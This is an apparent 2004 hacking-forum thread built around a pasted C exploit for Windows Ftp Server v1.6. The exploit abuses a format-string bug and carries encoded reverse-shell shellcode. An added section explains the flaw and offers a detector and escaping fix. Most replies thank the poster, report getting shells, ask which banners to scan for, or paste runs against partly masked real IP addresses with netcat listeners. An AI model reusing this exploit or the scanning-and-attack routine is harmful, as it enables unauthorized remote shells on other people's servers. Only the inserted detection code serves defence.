Wolfman
Jan 13 2004, 06:50 PM
| QUOTE |
/*
date: 12 janv 2004
subject: PoC exploit for Windows Ftp Server v1.6
vendor: http://srv.nease.net
credits: Peter Winter-Smith for the bug discovery
shellcode: reverse shell (~ 200 bytes)
notes: universal (doesn't rely on NT version), 2nd version of this exploit
greets: rosecurity team
author: mandragore, sploiting@mandragore.solidshells.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memcpy/strcat/strncat/strlen; missing from the original paste */
#include <strings.h>  /* bzero; missing from the original paste */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>

unsigned char sc[]={
// some padding
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,
// restore patched code in MFC42.DLL so it doesn't crash yet
0xBF,0x2B,0x38,0x40,0x5F,0x66,0xB8,0x53,0x8B,0x66,0xAB,0x47,0x66,0xB8,0x40,0xB1,
0x66,0xAB,
// overoptimised reverse shell relying on offsets in the WinFTPServer.exe's IAT
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB7,0x80,0x36,0x96,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x1A,0x06,0xD7,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0x06,0x06,
0xD7,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0x14,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0x50,0x91,0xD2,0xF0,0x51,0xD1,0xBA,0x97,0x97,0x1F,0xC9,0xAE,0x1F,0xC9,
0xAA,0x1F,0xC9,0xD6,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,
0xF5,0xFB,0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,
0xC6,0xE4,0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,
0x9A,0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46};

void usage(char *argv0) {
  printf("usage: %s -d <ip_dest> [options]\n",argv0);
  printf("options:\n");
  printf(" -h ip_host for the reversed shell (default 127.0.0.1)\n");
  printf(" -p port for the reversed shell (default 80)\n\n");
  exit(1);
}

int main(int argc, char **argv) {
  struct sockaddr_in saddr;
#define port 21
  int target=0, lhost=0x0100007f;
  int lport=80;
  int where=0x5f40382b;
  int val1=0xc283, val2=0xe2ff;
  int delta=0x11eeca8-0x11ee96c;
  char *buff;
  int s, ret, i;

  printf("[%%] winftpserv v1.6 sploit by mandragore (v2)\n");
  if (argc<2) { usage(argv[0]); }
  while((i = getopt(argc, argv, "d:h:p:"))!= EOF) {
    switch (i) {
      case 'd': target=inet_addr(optarg); break;
      case 'h': lhost=inet_addr(optarg); break;
      case 'p': lport=atoi(optarg); break;
      default: usage(argv[0]); break;
    }
  }
  if ((target==-1) || (lhost==-1)) usage(argv[0]);
  printf("[.] if working you'll have a shell on %s:%d .\n",inet_ntoa(*(struct in_addr *)&lhost),lport);
  printf("[.] launching attack on %s..\n",inet_ntoa(*(struct in_addr *)&target));

  // patch the XOR-encoded callback port and host into the shellcode
  lport=lport ^ 0x9696;
  lport=(lport & 0xff) << 8 | lport >>8;
  memcpy(sc+17+18+0x5a,&lport,2);
  lhost=lhost ^ 0x96969696;
  memcpy(sc+17+18+0x53,&lhost,4);

  // build the format-string payload: target address, shellcode, "%08x" pops, then two "%hn" writes
  buff=(char *)malloc(4096);
  bzero(buff,4096);
  memcpy(buff,&where,4);
  strcat(buff,"xyzy");
  where+=3;
  memcpy(buff+8,&where,4);
  strncat(buff,sc,strlen(sc));
  for (i=0;i<(delta-1)/4;i++) { strcat(buff,"%08x"); }
  // note: passing buff as both the destination and the %s argument is undefined behaviour in C
  sprintf(buff,"%s%%0%dx%%hn%%0%dx%%hn\r\n",buff,val1-strlen(sc)-((delta-1)/4)*8-4*3-7,val2-val1);

  saddr.sin_family = AF_INET;
  saddr.sin_addr.s_addr = target;
  saddr.sin_port = htons(port);
  s=socket(2,1,6);
  ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
  if (ret==-1) { perror("[-] connect()"); exit(1); }
  send(s,buff,strlen(buff),0);
  recv(s,buff,1024,0);
  close(s);
  printf("[+] done.\n");
  exit(0);
}
|
h:\>soft.exe
[%] winftpserv v1.6 sploit by mandragore (v2)
usage: soft -d <ip_dest> [options]
options:
 -h ip_host for the reversed shell (default 127.0.0.1)
 -p port for the reversed shell (default 80)
I've not tested it because I don't know how to scan for this specific FTP server, and since there are billions of FTP servers out there....
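The bug the PoC above leans on is a format-string flaw: the FTP command line reaches a printf-style function as the format itself, so the "%08x" runs walk the stack and the "%hn" directives write to the address placed at the front of the buffer. The following is an added example from the editor's side, not part of this thread or of mandragore's code: a small C checker a server or an IDS could run over each incoming FTP command line to flag that pattern, plus the server-side mitigation of escaping '%' before data is ever handed to a legacy format-based logger. The function names (inspect_ftp_line, is_format_string_attack, escape_percent), the sample lines and the "more than four conversions" threshold are all constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Result of inspecting one FTP command line for printf-style directives. */
struct fmt_report {
    int conversions;   /* number of '%' conversions other than the literal "%%" */
    int writes;        /* number of %n-family write directives (%n, %hn, %hhn, %ln) */
};

/* Walk a command line and count directives the way a printf-family parser
 * would see them: flags (-+ #0), width, precision and length modifiers
 * (h, hh, l, ll) are skipped before the conversion character is examined. */
struct fmt_report inspect_ftp_line(const char *line)
{
    struct fmt_report r = {0, 0};
    const char *p = line;
    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }                  /* "%%" is a literal percent */
        while (*p && strchr("-+ #0", *p)) p++;             /* flags */
        while (isdigit((unsigned char)*p)) p++;            /* width */
        if (*p == '.') {                                   /* precision */
            p++;
            while (isdigit((unsigned char)*p)) p++;
        }
        while (*p == 'h' || *p == 'l') p++;                /* length modifier */
        if (*p == '\0') break;                             /* dangling '%' at end of line */
        r.conversions++;
        if (*p == 'n') r.writes++;
        p++;
    }
    return r;
}

/* Detection policy (constructed for this example): any write directive, or an
 * unusual number of conversions in a single FTP command, is treated as a
 * format-string attempt. Legitimate commands rarely contain '%' at all. */
int is_format_string_attack(const char *line)
{
    struct fmt_report r = inspect_ftp_line(line);
    return r.writes > 0 || r.conversions > 4;
}

/* Mitigation: never pass user data as a format string. Where a legacy logger
 * insists on one, escape every '%' as "%%" first so the data is inert.
 * Returns a newly allocated string that the caller frees. */
char *escape_percent(const char *s)
{
    size_t n = strlen(s), extra = 0;
    for (size_t i = 0; i < n; i++) if (s[i] == '%') extra++;
    char *out = malloc(n + extra + 1);
    if (!out) return NULL;
    char *q = out;
    for (size_t i = 0; i < n; i++) {
        if (s[i] == '%') *q++ = '%';
        *q++ = s[i];
    }
    *q = '\0';
    return out;
}

int main(void)
{
    /* Constructed sample lines: one benign login, one shaped like the payload
     * above (the leading address bytes replaced by "AAAA" for readability). */
    const char *samples[] = {
        "USER anonymous\r\n",
        "USER AAAA%08x%08x%08x%08x%08x%0200x%hn\r\n",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct fmt_report r = inspect_ftp_line(samples[i]);
        char *safe = escape_percent(samples[i]);
        printf("%-6s conversions=%d writes=%d\n",
               is_format_string_attack(samples[i]) ? "ATTACK" : "ok",
               r.conversions, r.writes);
        printf("  escaped for a legacy logger: %s", safe);  /* sample already ends in CRLF */
        free(safe);
    }
    return 0;
}
```

The real fix on the server side is the one-character change from printf(cmd) to printf("%s", cmd); the escaping helper is only for code paths you cannot change. The detector is deliberately strict about "%n", since no FTP command has a legitimate reason to carry it.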
clip
Jan 13 2004, 06:53 PM
Try my banner scanner a few posts down
cyrixx
Jan 13 2004, 08:19 PM
thhhhx for the tools! try it!
BlueSkydrei
Jan 13 2004, 08:21 PM
THX, I'll test it ;-)
Xenos
Jan 13 2004, 09:08 PM
It will be tested for sure  Thanks man
BlueSkydrei
Jan 13 2004, 09:35 PM
Works very well, got root shell.
Test OS: Windows XP SP1
I'll post an auto hacker in a few minutes.
Test24
Jan 13 2004, 09:36 PM
but how do you scan for this, which port? thanks
vnet576
Jan 13 2004, 09:58 PM
Confirmed..works on XP sp0 as well. Test24...look at the code and u will see what port is used.
Test24
Jan 13 2004, 10:23 PM
port 21 or port 80 ???
vnet576
Jan 13 2004, 10:26 PM
| QUOTE (Test24 @ Jan 13 2004, 05:23 PM) | | port 21 or port 80 ??? |
well at least u looked at the code this time
#define port 21 (thats the port u scan for)
80 is the reverse port.
Test24
Jan 13 2004, 10:29 PM
ok thanks a lot
Axl
Jan 14 2004, 10:24 AM
what is the banner of Windows Ftp Server V1.6 ???
larsbruggie
Jan 14 2004, 01:01 PM
thnx a lot, lets hope it works
Max_Payne
Jan 14 2004, 02:53 PM
this is definitely something worth testing..thanks dude..gonna see if it runs under win2k sp4
yeyo
Jan 15 2004, 09:11 AM
Thanks a lot 4 the xploit man, let's try it --- Doesn't work at W2K SP4, let's try it at my XP box
Trepet
Jan 15 2004, 05:59 PM
Yeah too bad it does not work on Windows 2000
react0r
Jan 15 2004, 07:17 PM
| CODE |
C:\>soft -d 213.100.12.*** -p 5050
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on 127.0.0.1:5050 .
[.] launching attack on 213.100.12.192..
[+] done.
|
| CODE |
C:\>soft -d 213.100.1.*** -p 5050
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on 127.0.0.1:5050 .
[.] launching attack on 213.100.1.208..
[+] done.
|
and nothing happens! what should I do? PS btw I started with Nc -l -vv -p 5050 ..
blackP0ster
Jan 15 2004, 07:52 PM
hm..i've installed "windows ftp server 1.6" on my home pc and hacked it in my lan. worked out well!!! and i have win2k..! the ftp server crashes and you get a shell..! nice exploit  black
BLaCkOuT
Jan 15 2004, 08:42 PM
thnx a lot
react0r
Jan 15 2004, 09:26 PM
why doesn't it work?!?!?!?!?! what should I write in NC and what to do in the exploit? I scanned a lot of banners!
react0r
Jan 15 2004, 09:53 PM
what's the banner that i should search for this exploit?
Test24
Jan 15 2004, 09:56 PM
It doesn't work because there are not a lot of IPs with this ftp, so wait for another exploit
s0v1v1d
Jan 16 2004, 06:07 AM
Shouldnt exploits be used to learn how not to be exploited by them?
| QUOTE | | It doesn't work because there is not a lot of ips with this ftp so wait another exploit |
Really man, come on.
oxygen007m
Jan 16 2004, 07:42 AM
thanks a lot wolfman ! lets try it if works !
Mephisto
Jan 16 2004, 02:05 PM
I don't understand this:
I have a few scans like this: 62.*.*.* 220 Microsoft FTP Service
After the scanning i start-up soft.exe like this:
C:\soft -d 62.*.*.* -h [My IP] OR C:\soft -d 62.*.*.*
After that i get
C:\>soft -d 62.*.*.*
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on 127.0.0.1:80 .
[.] launching attack on 62.*.*.*..
[+] done.
OR
C:\>soft -d 62.*.*.* -h [MY IP]
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on [MY IP]:80 .
[.] launching attack on 62.*.*.*..
[+] done.
But what do I have to do after that.... I tried the listening mode with Netcat: NC -l -vv -p 80
But nothing helps....how in the world do i connect to the shell.
Many thnx Mephisto
PSR
Jan 16 2004, 02:14 PM
that's cause the exploit ain't made for Microsoft FTP Server but Windows FTP Server. 2 different things man
derquakecommander
Jan 16 2004, 07:48 PM
i have installed v1.6 on my lan box and when i exploit the pc the ftp crashes only and no shell
Win2k SP 3
Thom
Jan 16 2004, 08:06 PM
react0r, it would be appreciated if you took the time to browse through the forum rules before you make a statement.
If you actually did read them you would know that it's forbidden to post real IPs.
Gotisch
Jan 16 2004, 08:27 PM
| QUOTE | | [.] if working you'll have a shell on [MY IP]:80 |
| QUOTE | | But what do i have 2 do after that.... I tried the listening mode with Netcat: NC -l -vv -p 80 |
Uli
Jan 17 2004, 06:03 PM
Thanks for the tool will try it
violator13
Jan 18 2004, 01:43 AM
thx! tested on win2k sp4 german.. it works! ftp server crashes and i get a shell  greetz violator
derquakecommander
Jan 18 2004, 01:53 PM
the xploited pc is win2k sp4 or your pc?
kok
Jan 18 2004, 05:57 PM
very nice
BuzzDee
Jan 20 2004, 09:04 PM
i did a remote port scan on port 21. that gave me a file with about 10 mb. then i did a remote banner scan which gave me a log file with over 20 mb... i downloaded it searched for the right banner but there was NOT ONLY ONE windows ftp server scan....
is there something more to say?
...
raif
Jan 21 2004, 11:18 PM
using this exploit i can crash windows ftp like nobody's business, but i can't get a shell out of it
Thonyx
Jan 22 2004, 05:36 PM
Work on Xp Sp0/Sp1 And 2k German
I'll test it
ThX
Tomjack2000
Jan 25 2004, 10:17 AM
Thankx for it i'll test it here